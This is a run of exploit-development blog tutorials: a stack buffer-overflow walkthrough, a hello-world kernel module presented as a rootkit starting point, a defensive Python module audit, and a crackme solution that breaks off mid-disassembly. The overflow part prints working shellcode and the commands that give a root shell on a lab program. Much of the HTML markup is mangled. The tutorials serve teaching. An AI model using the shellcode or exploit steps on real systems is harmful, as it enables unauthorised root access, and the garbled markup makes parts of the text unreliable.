class="gp"#/spanincludelt;stdio.hgt;/span span class="code-line"span class="gp"#/spanincludelt;string.hgt;/span span class="code-line"/span span class="code-line"span class="go"unsigned char code[] = \/span/span span class="code-line"span class="go"quot;\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43quot;;/span/span span class="code-line"/span span class="code-line"span class="go"main()/span/span span class="code-line"span class="go"{/span/span span class="code-line"/span span class="code-line"span class="go" printf(quot;Shellcode Length: %d\nquot;, strlen(code));/span/span span class="code-line"/span span class="code-line"span class="go" int 
(*ret)() = (int(*)())code;/span/span span class="code-line"/span span class="code-line"span class="go" ret();/span/span span class="code-line"/span span class="code-line"span class="go"}/span/span span class="code-line"span class="gp"[email protected]:~$ /spangcc -z execstack -o shellcode shellcode.c/span span class="code-line"span class="gp"[email protected]:~$ /span./shellcode/span span class="code-line"span class="go"Shellcode Length: 57/span/span span class="code-line"span class="gp"[email protected]:/home/testuser$/span/span span class="code-line"/code/pre/div /td/tr/table pThat seems to work, let's test it out:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/span span class="code-line"span class="normal"9/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanspan class="nb"export/span span class="nv"SHELLCODE/spanspan class="o"=/spanspan class="k"$(/spanpython -c span class="s1"#39;print quot;\x90quot; * 500 + quot;\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43quot;#39;/spanspan class="k")/span/span span class="code-line"span class="gp"[email protected]:~$ /span./getenvaddr SHELLCODE ./app/span span class="code-line"span class="go"SHELLCODE will be at 0xbffff76c/span/span span class="code-line"span class="gp"[email protected]:~$ ./app $/spanspan class="o"(/spanpython -c 
span class="s1"#39;print quot;Aquot; * 528 + quot;\x6c\xf7\xff\xbfquot;#39;/spanspan class="o")/span/span span class="code-line"span class="gp"[email protected]:/home/testuser# /spanwhoami/span span class="code-line"span class="go"root/span/span span class="code-line"span class="gp"[email protected]:/home/testuser# /spancat secret.txt/span span class="code-line"span class="go"This is a top secret file!/span/span span class="code-line"span class="go"Only people with the password should be able to view this file!/span/span span class="code-line"/code/pre/div /td/tr/table pPWNED!!! :-D/p h2Conclusion/h2 pIt's very important to understand that when you are developing exploits you are always going to run into problems, that is why I left the bit in here where I didn't get root access. You will fail over and over again but if you continue trying you will find a way to hack it in the end. /p pThis was one of the simplest examples possible but before continuing it is important that you are able to do this. Don't worry if you don't understand how the application execution was hijacked or how the stack works, I will explain all of that in later tutorials when it is absolutely necessary, this tutorial is already long enough without going into more depth./p pI hope you enjoyed reading this as much as I enjoyed writing it./p pHappy Hacking :-)/p

First LKM

10 May 2014 at 07:46
By: 0xe7
<p>A <a href="https://en.wikipedia.org/wiki/Loadable_kernel_module" target="_blank">loadable kernel module</a> (LKM) is the easiest way to create a <a href="https://en.wikipedia.org/wiki/Rootkit" target="_blank">rootkit</a>, although it is also the noisiest and the easiest to defend against. Once root (or system level privileges) is gained on a machine, a rootkit is the best way to maintain root access to that machine.</p>
<p>Here I will try to explain the basics of what an LKM actually is and how to create and test a very basic one for <a href="https://en.wikipedia.org/wiki/Linux" target="_blank">Linux</a>.</p>
<p>An LKM is a plugin to the <a href="https://en.wikipedia.org/wiki/Kernel_%28computing%29" target="_blank">kernel</a>. It allows you to run code with the same permissions as the kernel, which isn't possible for normal <a href="https://en.wikipedia.org/wiki/User_space" target="_blank">userland</a> applications. <a href="https://en.wikipedia.org/wiki/Device_driver" target="_blank">Device drivers</a> are LKMs, as they need permission to access the computer's hardware, so whether you know it or not you already have some experience with LKMs. Throughout this post I will be using LKM and module interchangeably.</p>
<h2>Creating A Hello World LKM</h2>
<p>Here is the code for the LKM that we will be creating:</p>
<pre><code> 1 #include &lt;linux/module.h&gt;
 2 #include &lt;linux/init.h&gt;
 3 
 4 MODULE_AUTHOR("0xe7, 0x1e");
 5 MODULE_DESCRIPTION("A simple hello world module");
 6 MODULE_LICENSE("GPL");
 7 
 8 static int __init hello_init(void)
 9 {
10     printk("Hello World!\n");
11     return 0;
12 }
13 
14 static void __exit hello_exit(void)
15 {
16     printk("Unloading hello.\n");
17     return;
18 }
19 
20 module_init(hello_init);
21 module_exit(hello_exit);
</code></pre>
<p>Lines 4 and 5 are just some information about the module. Line 6 is needed, otherwise when we load the module we get the following error message in the system log:</p>
<p><code>hello: module license 'unspecified' taints kernel.</code></p>
<p>The module will still load, but as we are learning to write a rootkit we want as little 'noise' as possible.</p>
<p>The function <code>hello_init</code> on lines 8 - 12 runs when the module is loaded; here we are just printing "Hello World!\n" to the system log. The function <code>hello_exit</code> on lines 14 - 18 runs when the module is unloaded; here we are just printing "Unloading hello.\n" to the system log. They are registered as the module's init and exit functions on lines 20 and 21.</p>
<h2>Compiling The LKM</h2>
<p>To <a href="https://en.wikipedia.org/wiki/Compiler" target="_blank">compile</a> it we need a <code>Makefile</code>; the Makefile below will do:</p>
<pre><code>obj-m += hello.o

all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
</code></pre>
<p>With both of these files in the same directory we can now compile our first LKM:</p>
<pre><code> 1 [email protected]:~/lkms# make
 2 make -C /lib/modules/3.12-kali1-686-pae/build M=/root/lkms modules
 3 make[1]: Entering directory `/usr/src/linux-headers-3.12-kali1-686-pae'
 4   CC [M]  /root/lkms/hello.o
 5   Building modules, stage 2.
 6   MODPOST 1 modules
 7   CC      /root/lkms/hello.mod.o
 8   LD [M]  /root/lkms/hello.ko
 9 make[1]: Leaving directory `/usr/src/linux-headers-3.12-kali1-686-pae'
10 [email protected]:~/lkms# ls -l
11 total 160
12 -rw-r--r-- 1 root root   384 May 12 19:35 hello.c
13 -rw-r--r-- 1 root root 70621 May 12 19:35 hello.ko
14 -rw-r--r-- 1 root root   650 May 12 19:35 hello.mod.c
15 -rw-r--r-- 1 root root 39088 May 12 19:35 hello.mod.o
16 -rw-r--r-- 1 root root 32540 May 12 19:35 hello.o
17 -rw-r--r-- 1 root root   156 May 12 19:35 Makefile
18 -rw-r--r-- 1 root root    27 May 12 19:35 modules.order
19 -rw-r--r-- 1 root root     0 May 12 19:35 Module.symvers
</code></pre>
<p>As we can see, the <code>make</code> command has created a number of files (<code>hello.ko</code>, <code>hello.mod.c</code>, <code>hello.mod.o</code>, <code>hello.o</code>, <code>modules.order</code>, <code>Module.symvers</code>). The file we are interested in is <code>hello.ko</code> on line 13; this is our module.</p>
<h2>Loading/Unloading The LKM</h2>
<p>I am using a 32 bit <a href="https://www.debian.org/" target="_blank">Debian</a> based Linux system (<a href="http://www.kali.org/" target="_blank">Kali</a>) for my development environment, but this should work on any modern Linux system; older systems might require some changes. (Do not try this on a production machine! Working with the kernel always has the possibility of crashing the kernel and bringing the whole system down! You have been warned!)</p>
<p>Here is how we load and unload the module, and check that everything has worked:</p>
<pre><code> 1 [email protected]:~/lkms# uname -r
 2 3.12-kali1-686-pae
 3 [email protected]:~/lkms# insmod ./hello.ko
 4 [email protected]:~/lkms# dmesg | tail -n 1
 5 [692908.561165] Hello World!
 6 [email protected]:~/lkms# lsmod | grep hello
 7 hello                  12363  0 
 8 [email protected]:~/lkms# rmmod hello
 9 [email protected]:~/lkms# dmesg | tail -n 1
10 [692925.071683] Unloading hello.
11 [email protected]:~/lkms# lsmod | grep hello
12 [email protected]:~/lkms#
</code></pre>
<p>First I have shown you the Linux kernel version I am using with the <code>uname</code> command on line 1; this is just so that if it doesn't work for you, you can check whether the versions are the same. The <code>insmod</code> command is used to load the module on line 3, and we check the system log to make sure it has printed the string "Hello World!\n" using the <code>dmesg</code> command on line 4. The <code>lsmod</code> command is used on line 6 to check that the module is actually loaded. The <code>rmmod</code> command is used on line 8 to unload the module, and the system log is checked again on line 9 to confirm that our printk has run correctly. Lastly we check with <code>lsmod</code> again to make sure the module has been unloaded correctly.</p>
<p>So we have a working LKM.</p>
<h2>Conclusion</h2>
<p>It is very easy to make mistakes with any programming, but the majority of mistakes in a normal application will not bring a system down. While it's always important to build and test code in a development environment, it's even more important when coding an application that runs in kernelland, as any tiny mistake can, and most likely will, bring the system down.</p>
<p>Happy Hacking :-)</p>
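The post notes that an LKM is the noisiest kind of rootkit and shows the two traces it leaves (the taint message in the system log and the lsmod entry). The following is an added example, not the author's code: a small Python audit that parses /proc/modules (what lsmod reads), decodes the kernel taint flags, and cross-checks the module list against /sys/module. The sample /proc/modules text, sysfs listing and taint mask are constructed; helper names (parse_proc_modules, hidden_modules, ...) are mine.

```python
"""Audit loaded kernel modules the way a defender checks for a noisy LKM.
Added example, not code from the original post: it parses /proc/modules (the
data lsmod prints), decodes the kernel taint flags that the 'module license
... taints kernel' message sets, and cross-checks against /sys/module."""
import os

# Taint bits as listed in the kernel's Documentation/admin-guide/tainted-kernels.rst
TAINT_BITS = {
    0: ("P", "proprietary (non-GPL-compatible) module loaded"),
    1: ("F", "module force-loaded"),
    2: ("S", "kernel running on an out-of-specification system"),
    3: ("R", "module force-unloaded"),
    4: ("M", "processor reported a machine check exception"),
    5: ("B", "bad page referenced or unexpected page flags"),
    6: ("U", "taint requested by a userspace application"),
    7: ("D", "kernel died recently (OOPS or BUG)"),
    8: ("A", "ACPI table overridden by user"),
    9: ("W", "kernel issued a warning"),
    10: ("C", "staging driver loaded"),
    11: ("I", "workaround for a platform firmware bug applied"),
    12: ("O", "externally built (out-of-tree) module loaded"),
    13: ("E", "unsigned module loaded"),
    14: ("L", "soft lockup occurred"),
    15: ("K", "kernel has been live patched"),
}
# Per-module flags the kernel prints in /proc/modules; they describe how a
# module was loaded rather than a hardware or kernel fault.
MODULE_TAINTS = set("POFCE")


def parse_proc_modules(text):
    """Parse /proc/modules: name size refcount used_by state address [(taints)]."""
    modules = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6:
            continue  # blank or malformed line
        name, size, refcount, used_by, state, address = fields[:6]
        taint = fields[6].strip("()") if len(fields) > 6 else ""
        modules[name] = {
            "size": int(size),
            "refcount": int(refcount),
            # "-" means no dependents; otherwise "a,b," with a trailing comma
            "used_by": [m for m in used_by.split(",") if m and m != "-"],
            "state": state,
            "address": int(address, 16),
            "taint": taint,
        }
    return modules


def decode_taint(mask):
    """Map the integer in /proc/sys/kernel/tainted to (flag, reason) pairs."""
    return [TAINT_BITS[bit] for bit in sorted(TAINT_BITS) if mask & (1 << bit)]


def suspicious_modules(modules):
    """Modules carrying a load-related taint (out-of-tree, unsigned, ...)."""
    return sorted(name for name, info in modules.items()
                  if MODULE_TAINTS & set(info["taint"]))


def hidden_modules(modules, sysfs_loaded):
    """Loaded modules visible in sysfs but missing from /proc/modules. A module
    that unlinks itself from the kernel's module list to escape lsmod still
    leaves its /sys/module directory behind."""
    return sorted(set(sysfs_loaded) - set(modules))


def sysfs_loaded_modules(root="/sys/module"):
    """Names of loadable modules under /sys/module. Built-in code gets a
    directory there too, but only a loaded module has an 'initstate' file."""
    return [name for name in os.listdir(root)
            if os.path.exists(os.path.join(root, name, "initstate"))]


def audit(proc_modules_text, sysfs_loaded, tainted_mask):
    """Run the three checks and return one report dictionary."""
    modules = parse_proc_modules(proc_modules_text)
    return {
        "taint": [flag for flag, _ in decode_taint(tainted_mask)],
        "suspicious": suspicious_modules(modules),
        "hidden": hidden_modules(modules, sysfs_loaded),
    }


# Constructed sample: hello.ko loaded out-of-tree without a GPL licence (P, O),
# an unsigned vendor module (O, E) and three in-tree netfilter modules.
SAMPLE_PROC_MODULES = """\
hello 12363 0 - Live 0xf8a14000 (PO)
vendor_drv 20480 0 - Live 0xf8a20000 (OE)
xt_conntrack 16384 0 - Live 0xf8a00000
nf_nat 40960 0 - Live 0xf89f0000
nf_conntrack 131072 2 xt_conntrack,nf_nat, Live 0xf89e0000
"""
# Constructed sysfs view: one loaded module has no /proc/modules entry.
SAMPLE_SYSFS_LOADED = ["hello", "vendor_drv", "xt_conntrack", "nf_nat",
                       "nf_conntrack", "ghost"]
SAMPLE_TAINTED = (1 << 0) | (1 << 12)  # what /proc/sys/kernel/tainted would hold
```

On a live system the same checks run on open("/proc/modules").read(), sysfs_loaded_modules() and int(open("/proc/sys/kernel/tainted").read()).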

An Easy Linux Crackme

11 May 2014 at 08:28
By: 0xe7
<p>The website http://crackmes.de contains a huge collection of applications that have been specifically created for people to practice <a href="https://en.wikipedia.org/wiki/Reverse_engineering">reverse engineering</a>, <a href="https://en.wikipedia.org/wiki/Software_cracking">software cracking</a> and <a href="https://en.wikipedia.org/wiki/Keygen">keygen</a> writing.</p>
<p>This solution tutorial is for a very easy one, but one that can be cracked without much reverse engineering experience or knowledge. It will, however, help if you understand how function calls work at the assembly level and how the stack works.</p>
<h2>The App</h2>
<p>Here we will take on this challenge: http://crackmes.de/users/seveb/crackme1/</p>
<p>We will work on the 32 bit version; as we will see, this version is actually broken, but the answer that we get works fine on the 64 bit version.</p>
<h2>Get To Know The App</h2>
<p>Let's try to find out some information about this application:</p>
<pre><code> 1 [email protected]:~# tar vxzf crackme01.tar.gz 
 2 crackmes/
 3 crackmes/crackme1_64bit
 4 crackmes/crackme1_32bit
 5 [email protected]:~# cd crackmes
 6 [email protected]:~/crackmes# file ./crackme1_32bit 
 7 ./crackme1_32bit: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x54fefefcb89fa2ccc70e24ac5f15fe5f5f44ef8b, not stripped
 8 [email protected]:~/crackmes# readelf -h ./crackme1_32bit 
 9 ELF Header:
10   Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 
11   Class:                             ELF32
12   Data:                              2's complement, little endian
13   Version:                           1 (current)
14   OS/ABI:                            UNIX - System V
15   ABI Version:                       0
16   Type:                              EXEC (Executable file)
17   Machine:                           Intel 80386
18   Version:                           0x1
19   Entry point address:               0x8048510
20   Start of program headers:          52 (bytes into file)
21   Start of section headers:          4508 (bytes into file)
22   Flags:                             0x0
23   Size of this header:               52 (bytes)
24   Size of program headers:           32 (bytes)
25   Number of program headers:         9
26   Size of section headers:           40 (bytes)
27   Number of section headers:         30
28   Section header string table index: 27
29 [email protected]:~/crackmes# ./crackme1_32bit 
30 Please enter the secret number: 0123456789
31 Nope.
32 [email protected]:~/crackmes# echo $?
33 1
34 [email protected]:~/crackmes# strings ./crackme1_32bit 
35 /lib/ld-linux.so.2
36 libc.so.6
37 _IO_stdin_used
38 fflush
39 exit
40 __isoc99_scanf
41 puts
42 __stack_chk_fail
43 stdin
44 printf
45 strlen
46 atoi
47 strcmp
48 __libc_start_main
49 __gmon_start__
50 GLIBC_2.7
51 GLIBC_2.4
52 GLIBC_2.0
53 PTRh0
54 QVhL
55 D$L1
56 D$6&lt;9u 
57 D$5&lt;6t
58 D$-E
59 \$Le3
60 [^_]
61 Nope.
62 Good job.
63 Please enter the secret number: 
64 %23s
65 Evilzone
66 The Password translates into %s, 
67 ;*2$"
</code></pre>
<p>We have got a lot of information here. Firstly we run <code>file</code> on line 6 and can see that the file is actually a 32 bit <a href="https://en.wikipedia.org/wiki/Executable_and_Linkable_Format">ELF file</a>. 
This is the file format used for Linux executables./p pLooking at the a href="https://en.wikipedia.org/wiki/Executable_and_Linkable_Format#File_header"elf headers/a using codereadelf -h/code tells us the a href="https://en.wikipedia.org/wiki/Entry_point"entry point/a address of the application (on line 19), meaning this is the point in memory where execution begins, this could be useful later./p pRunning the application, it asks us for a "secret number". Putting in something random gives us the output codeNope./code (on line 31) and exits with exit code 1 (on line 33)./p pLastly we've run codestrings/code against the application (on line 34) which gives us a list of all of the clear text strings in the executable. 2 things stand out, the codeGood job./code string on line 62, which looks like this is printed to screen if you input the right number, and the codeEvilzone/code as well as the codeThe Password translates into %s,/code stings on lines 65 and 66 respectively. Based on these last 2 strings it looks like the secret number has something to do with the string codeEvilzone/code./p h2Disassemble / Debug The App/h2 pNormally now we could use a href="https://sourceware.org/binutils/docs/binutils/objdump.html"objdump/a but as this is such an easy one lets go straight into live a href="https://en.wikipedia.org/wiki/Debugging"debugging/a with codegdb/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal" 10/span/span span 
class="code-line"span class="normal" 11/span/span span class="code-line"span class="normal" 12/span/span span class="code-line"span class="normal" 13/span/span span class="code-line"span class="normal" 14/span/span span class="code-line"span class="normal" 15/span/span span class="code-line"span class="normal" 16/span/span span class="code-line"span class="normal" 17/span/span span class="code-line"span class="normal" 18/span/span span class="code-line"span class="normal" 19/span/span span class="code-line"span class="normal" 20/span/span span class="code-line"span class="normal" 21/span/span span class="code-line"span class="normal" 22/span/span span class="code-line"span class="normal" 23/span/span span class="code-line"span class="normal" 24/span/span span class="code-line"span class="normal" 25/span/span span class="code-line"span class="normal" 26/span/span span class="code-line"span class="normal" 27/span/span span class="code-line"span class="normal" 28/span/span span class="code-line"span class="normal" 29/span/span span class="code-line"span class="normal" 30/span/span span class="code-line"span class="normal" 31/span/span span class="code-line"span class="normal" 32/span/span span class="code-line"span class="normal" 33/span/span span class="code-line"span class="normal" 34/span/span span class="code-line"span class="normal" 35/span/span span class="code-line"span class="normal" 36/span/span span class="code-line"span class="normal" 37/span/span span class="code-line"span class="normal" 38/span/span span class="code-line"span class="normal" 39/span/span span class="code-line"span class="normal" 40/span/span span class="code-line"span class="normal" 41/span/span span class="code-line"span class="normal" 42/span/span span class="code-line"span class="normal" 43/span/span span class="code-line"span class="normal" 44/span/span span class="code-line"span class="normal" 45/span/span span class="code-line"span class="normal" 46/span/span span 
class="code-line"span class="normal" 47/span/span span class="code-line"span class="normal" 48/span/span span class="code-line"span class="normal" 49/span/span span class="code-line"span class="normal" 50/span/span span class="code-line"span class="normal" 51/span/span span class="code-line"span class="normal" 52/span/span span class="code-line"span class="normal" 53/span/span span class="code-line"span class="normal" 54/span/span span class="code-line"span class="normal" 55/span/span span class="code-line"span class="normal" 56/span/span span class="code-line"span class="normal" 57/span/span span class="code-line"span class="normal" 58/span/span span class="code-line"span class="normal" 59/span/span span class="code-line"span class="normal" 60/span/span span class="code-line"span class="normal" 61/span/span span class="code-line"span class="normal" 62/span/span span class="code-line"span class="normal" 63/span/span span class="code-line"span class="normal" 64/span/span span class="code-line"span class="normal" 65/span/span span class="code-line"span class="normal" 66/span/span span class="code-line"span class="normal" 67/span/span span class="code-line"span class="normal" 68/span/span span class="code-line"span class="normal" 69/span/span span class="code-line"span class="normal" 70/span/span span class="code-line"span class="normal" 71/span/span span class="code-line"span class="normal" 72/span/span span class="code-line"span class="normal" 73/span/span span class="code-line"span class="normal" 74/span/span span class="code-line"span class="normal" 75/span/span span class="code-line"span class="normal" 76/span/span span class="code-line"span class="normal" 77/span/span span class="code-line"span class="normal" 78/span/span span class="code-line"span class="normal" 79/span/span span class="code-line"span class="normal" 80/span/span span class="code-line"span class="normal" 81/span/span span class="code-line"span class="normal" 82/span/span span 
class="code-line"span class="normal" 83/span/span span class="code-line"span class="normal" 84/span/span span class="code-line"span class="normal" 85/span/span span class="code-line"span class="normal" 86/span/span span class="code-line"span class="normal" 87/span/span span class="code-line"span class="normal" 88/span/span span class="code-line"span class="normal" 89/span/span span class="code-line"span class="normal" 90/span/span span class="code-line"span class="normal" 91/span/span span class="code-line"span class="normal" 92/span/span span class="code-line"span class="normal" 93/span/span span class="code-line"span class="normal" 94/span/span span class="code-line"span class="normal" 95/span/span span class="code-line"span class="normal" 96/span/span span class="code-line"span class="normal" 97/span/span span class="code-line"span class="normal" 98/span/span span class="code-line"span class="normal" 99/span/span span class="code-line"span class="normal"100/span/span span class="code-line"span class="normal"101/span/span span class="code-line"span class="normal"102/span/span span class="code-line"span class="normal"103/span/span span class="code-line"span class="normal"104/span/span span class="code-line"span class="normal"105/span/span span class="code-line"span class="normal"106/span/span span class="code-line"span class="normal"107/span/span span class="code-line"span class="normal"108/span/span span class="code-line"span class="normal"109/span/span span class="code-line"span class="normal"110/span/span span class="code-line"span class="normal"111/span/span span class="code-line"span class="normal"112/span/span span class="code-line"span class="normal"113/span/span span class="code-line"span class="normal"114/span/span span class="code-line"span class="normal"115/span/span span class="code-line"span class="normal"116/span/span span class="code-line"span class="normal"117/span/span span class="code-line"span class="normal"118/span/span span 
class="code-line"span class="normal"119/span/span span class="code-line"span class="normal"120/span/span span class="code-line"span class="normal"121/span/span span class="code-line"span class="normal"122/span/span span class="code-line"span class="normal"123/span/span span class="code-line"span class="normal"124/span/span span class="code-line"span class="normal"125/span/span span class="code-line"span class="normal"126/span/span span class="code-line"span class="normal"127/span/span span class="code-line"span class="normal"128/span/span span class="code-line"span class="normal"129/span/span span class="code-line"span class="normal"130/span/span span class="code-line"span class="normal"131/span/span span class="code-line"span class="normal"132/span/span span class="code-line"span class="normal"133/span/span span class="code-line"span class="normal"134/span/span span class="code-line"span class="normal"135/span/span span class="code-line"span class="normal"136/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~/crackmes# /spangdb -q ./crackme1_32bit/span span class="code-line"span class="go"Reading symbols from /root/crackme/crackmes/crackme1_32bit...(no debugging symbols found)...done./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"set disassembly-flavor intel/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"info functions/span/span span class="code-line"span class="go"All defined functions:/span/span span class="code-line"/span span class="code-line"span class="go"Non-debugging symbols:/span/span span class="code-line"span class="go"0x08048420 _init/span/span span class="code-line"span class="go"0x08048460 strcmp/span/span span class="code-line"span class="go"0x08048460 [email protected]/span/span span class="code-line"span class="go"0x08048470 printf/span/span span class="code-line"span class="go"0x08048470 [email 
protected]/span/span span class="code-line"span class="go"0x08048480 fflush/span/span span class="code-line"span class="go"0x08048480 [email protected]/span/span span class="code-line"span class="go"0x08048490 __stack_chk_fail/span/span span class="code-line"span class="go"0x08048490 [email protected]/span/span span class="code-line"span class="go"0x080484a0 puts/span/span span class="code-line"span class="go"0x080484a0 [email protected]/span/span span class="code-line"span class="go"0x080484b0 __gmon_start__/span/span span class="code-line"span class="go"0x080484b0 [email protected]/span/span span class="code-line"span class="go"0x080484c0 exit/span/span span class="code-line"span class="go"0x080484c0 [email protected]/span/span span class="code-line"span class="go"0x080484d0 strlen/span/span span class="code-line"span class="go"0x080484d0 [email protected]/span/span span class="code-line"span class="go"0x080484e0 __libc_start_main/span/span span class="code-line"span class="go"0x080484e0 [email protected]/span/span span class="code-line"span class="go"0x080484f0 __isoc99_scanf/span/span span class="code-line"span class="go"0x080484f0 [email protected]/span/span span class="code-line"span class="go"0x08048500 atoi/span/span span class="code-line"span class="go"0x08048500 [email protected]/span/span span class="code-line"span class="go"0x08048510 _start/span/span span class="code-line"span class="go"0x08048540 __x86.get_pc_thunk.bx/span/span span class="code-line"span class="go"0x08048550 deregister_tm_clones/span/span span class="code-line"span class="go"0x08048580 register_tm_clones/span/span span class="code-line"span class="go"0x080485c0 __do_global_dtors_aux/span/span span class="code-line"span class="go"0x080485e0 frame_dummy/span/span span class="code-line"span class="go"0x0804860d nope/span/span span class="code-line"span class="go"0x08048638 yes/span/span span class="code-line"span class="go"0x0804864c main/span/span span class="code-line"span 
class="go"0x080487c0 __libc_csu_init/span/span span class="code-line"span class="go"0x08048830 __libc_csu_fini/span/span span class="code-line"span class="go"0x08048834 _fini/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble main/span/span span class="code-line"span class="go"Dump of assembler code for function main:/span/span span class="code-line"span class="go" 0x0804864c lt;+0gt;: push ebp/span/span span class="code-line"span class="go" 0x0804864d lt;+1gt;: mov ebp,esp/span/span span class="code-line"span class="go" 0x0804864f lt;+3gt;: push ebx/span/span span class="code-line"span class="go" 0x08048650 lt;+4gt;: and esp,0xfffffff0/span/span span class="code-line"span class="go" 0x08048653 lt;+7gt;: sub esp,0x50/span/span span class="code-line"span class="go" 0x08048656 lt;+10gt;: mov eax,gs:0x14/span/span span class="code-line"span class="go" 0x0804865c lt;+16gt;: mov DWORD PTR [esp+0x4c],eax/span/span span class="code-line"span class="go" 0x08048660 lt;+20gt;: xor eax,eax/span/span span class="code-line"span class="go" 0x08048662 lt;+22gt;: mov DWORD PTR [esp],0x8048860/span/span span class="code-line"span class="go" 0x08048669 lt;+29gt;: call 0x8048470 lt;[email protected];/span/span span class="code-line"span class="go" 0x0804866e lt;+34gt;: lea eax,[esp+0x35]/span/span span class="code-line"span class="go" 0x08048672 lt;+38gt;: mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="go" 0x08048676 lt;+42gt;: mov DWORD PTR [esp],0x8048881/span/span span class="code-line"span class="go" 0x0804867d lt;+49gt;: call 0x80484f0 lt;[email protected];/span/span span class="code-line"span class="go" 0x08048682 lt;+54gt;: mov DWORD PTR [esp+0x28],eax/span/span span class="code-line"span class="go" 0x08048686 lt;+58gt;: cmp DWORD PTR [esp+0x28],0x1/span/span span class="code-line"span class="go" 0x0804868b lt;+63gt;: jne 0x804869f lt;main+83gt;/span/span span class="code-line"span class="go" 0x0804868d 
lt;+65gt;: movzx eax,BYTE PTR [esp+0x36]/span/span span class="code-line"span class="go" 0x08048692 lt;+70gt;: cmp al,0x39/span/span span class="code-line"span class="go" 0x08048694 lt;+72gt;: jne 0x804869f lt;main+83gt;/span/span span class="code-line"span class="go" 0x08048696 lt;+74gt;: movzx eax,BYTE PTR [esp+0x35]/span/span span class="code-line"span class="go" 0x0804869b lt;+79gt;: cmp al,0x36/span/span span class="code-line"span class="go" 0x0804869d lt;+81gt;: je 0x80486a6 lt;main+90gt;/span/span span class="code-line"span class="go" 0x0804869f lt;+83gt;: call 0x804860d lt;nopegt;/span/span span class="code-line"span class="go" 0x080486a4 lt;+88gt;: jmp 0x80486b3 lt;main+103gt;/span/span span class="code-line"span class="go" 0x080486a6 lt;+90gt;: mov eax,ds:0x804a040/span/span span class="code-line"span class="go" 0x080486ab lt;+95gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x080486ae lt;+98gt;: call 0x8048480 lt;[email protected];/span/span span class="code-line"span class="go" 0x080486b3 lt;+103gt;: mov DWORD PTR [esp+0x2d],0x0/span/span span class="code-line"span class="go" 0x080486bb lt;+111gt;: mov DWORD PTR [esp+0x31],0x0/span/span span class="code-line"span class="go" 0x080486c3 lt;+119gt;: mov BYTE PTR [esp+0x2d],0x45/span/span span class="code-line"span class="go" 0x080486c8 lt;+124gt;: mov DWORD PTR [esp+0x18],0x1/span/span span class="code-line"span class="go" 0x080486d0 lt;+132gt;: mov DWORD PTR [esp+0x1c],0x2/span/span span class="code-line"span class="go" 0x080486d8 lt;+140gt;: mov DWORD PTR [esp+0x20],0x3/span/span span class="code-line"span class="go" 0x080486e0 lt;+148gt;: mov DWORD PTR [esp+0x24],0x4/span/span span class="code-line"span class="go" 0x080486e8 lt;+156gt;: jmp 0x804875a lt;main+270gt;/span/span span class="code-line"span class="go" 0x080486ea lt;+158gt;: lea edx,[esp+0x35]/span/span span class="code-line"span class="go" 0x080486ee lt;+162gt;: mov eax,DWORD PTR [esp+0x1c]/span/span span 
class="code-line"span class="go" 0x080486f2 lt;+166gt;: add eax,edx/span/span span class="code-line"span class="go" 0x080486f4 lt;+168gt;: movzx eax,BYTE PTR [eax]/span/span span class="code-line"span class="go" 0x080486f7 lt;+171gt;: mov BYTE PTR [esp+0x15],al/span/span span class="code-line"span class="go" 0x080486fb lt;+175gt;: lea edx,[esp+0x35]/span/span span class="code-line"span class="go" 0x080486ff lt;+179gt;: mov eax,DWORD PTR [esp+0x20]/span/span span class="code-line"span class="go" 0x08048703 lt;+183gt;: add eax,edx/span/span span class="code-line"span class="go" 0x08048705 lt;+185gt;: movzx eax,BYTE PTR [eax]/span/span span class="code-line"span class="go" 0x08048708 lt;+188gt;: mov BYTE PTR [esp+0x16],al/span/span span class="code-line"span class="go" 0x0804870c lt;+192gt;: lea edx,[esp+0x35]/span/span span class="code-line"span class="go" 0x08048710 lt;+196gt;: mov eax,DWORD PTR [esp+0x24]/span/span span class="code-line"span class="go" 0x08048714 lt;+200gt;: add eax,edx/span/span span class="code-line"span class="go" 0x08048716 lt;+202gt;: movzx eax,BYTE PTR [eax]/span/span span class="code-line"span class="go" 0x08048719 lt;+205gt;: mov BYTE PTR [esp+0x17],al/span/span span class="code-line"span class="go" 0x0804871d lt;+209gt;: lea eax,[esp+0x2d]/span/span span class="code-line"span class="go" 0x08048721 lt;+213gt;: mov DWORD 